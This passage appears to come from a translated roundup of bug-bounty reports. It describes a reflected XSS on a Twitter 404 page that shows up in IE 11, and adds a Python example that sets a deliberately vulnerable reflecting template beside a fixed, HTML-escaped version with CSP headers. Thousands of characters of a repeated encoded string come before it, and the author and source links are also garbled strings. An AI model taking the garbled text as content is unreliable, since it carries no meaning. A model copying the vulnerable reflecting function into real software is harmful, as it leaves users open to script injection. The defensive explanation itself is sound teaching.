Q4x3X3g2Q4x3X3g
2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g
2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3f1`.
This vulnerability allows a malicious attacker to inject HTML tags and execute JS, which can ultimately leak the user's session, enable CSRF, or introduce a phishing page.
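The browser-specific detail (IE 11 forwarding a raw path after a 302) only matters because the 404 page reflected the request path without encoding. The following added example (written for this page; it is not Twitter's code) shows the reflecting page beside a fixed version that decodes the path once and HTML-escapes it at the point of output, so the result is inert whether or not the client percent-encoded the request, together with the response headers that limit what an injection could do if escaping were ever missed. The template text and header set are assumptions for the demonstration.

```python
import html
from urllib.parse import unquote

# Error-page template that echoes the requested path (assumed; not Twitter's page).
TEMPLATE = "<html><body><h1>404 Not Found</h1><p>The requested URL %s was not found.</p></body></html>"


def render_not_found_vulnerable(raw_path):
    """The reported bug class: the request path is reflected verbatim, so a path that
    reaches the server unencoded lands in the page as live markup."""
    return TEMPLATE % raw_path


def render_not_found(raw_path):
    """Decode once, then escape for the HTML text context at output time.

    Escaping after decoding means a raw "<" and a percent-encoded "%3C" render identically
    and harmlessly, which removes the dependency on how a particular browser encodes URLs."""
    shown = unquote(raw_path)
    return TEMPLATE % html.escape(shown, quote=True)


def not_found_response(raw_path):
    """Status, headers and body for the error page. The headers are defence in depth:
    nosniff stops content-type guessing, and the CSP forbids script and external loads."""
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'",
    }
    return 404, headers, render_not_found(raw_path)
```

Escaping is context-specific: `html.escape` is correct for text between tags and for quoted attribute values, but a path reflected into a URL attribute, a script block or a CSS rule needs the encoder for that context instead. The error page is also a good place to verify that the reflected value is the only user-controlled input on the page; the threshold behaviour described above (IE hiding short error bodies) is a display quirk, not a security control, and should not be relied on either way.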

If you find a report instructive or excellent, upvote it on the Hacktivity page.


Afterword

Want to appear next quarter? Submit your vulnerability reports or invite your hacker team, just as the companies above did. As a blog I once read put it, every team needs a bounty program.

Rejesh F. Krishnan
769K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4l9@1i4K6u0W2M7h3S2A6L8h3N6Q4x3X3g2U0L8$3#2Q4x3V1k6@1x3o6q4U0k6o6k6S2x3U0p5#2j5h3c8X3z5o6g2X3j5e0b7#2i4K6u0W2K9Y4m8Y4K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4l9H3i4K6u0W2M7h3S2A6L8h3N6Q4x3X3g2U0L8$3#2Q4x3V1k6@1x3o6q4V1x3h3k6U0z5e0j5^5x3h3b7#2x3U0l9$3y4K6M7#2i4K6u0W2K9Y4m8Y4
This article was translated by 安全客; when reposting, please credit "转自安全客" and include the link.
Original link: c86K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Z5j5h3y4C8k6i4u0G2L8X3g2Q4x3X3g2U0L8$3#2Q4x3V1k6T1L8r3!0Y4i4K6u0r3N6r3!0H3i4K6u0V1N6Y4g2D9L8X3g2J5j5h3u0A6L8r3W2@1P5g2)9J5k6s2u0W2M7r3!0J5N6s2y4Q4x3X3c8G2k6W2)9J5k6o6y4c8i4K6u0V1x3U0l9I4y4R3`.`.
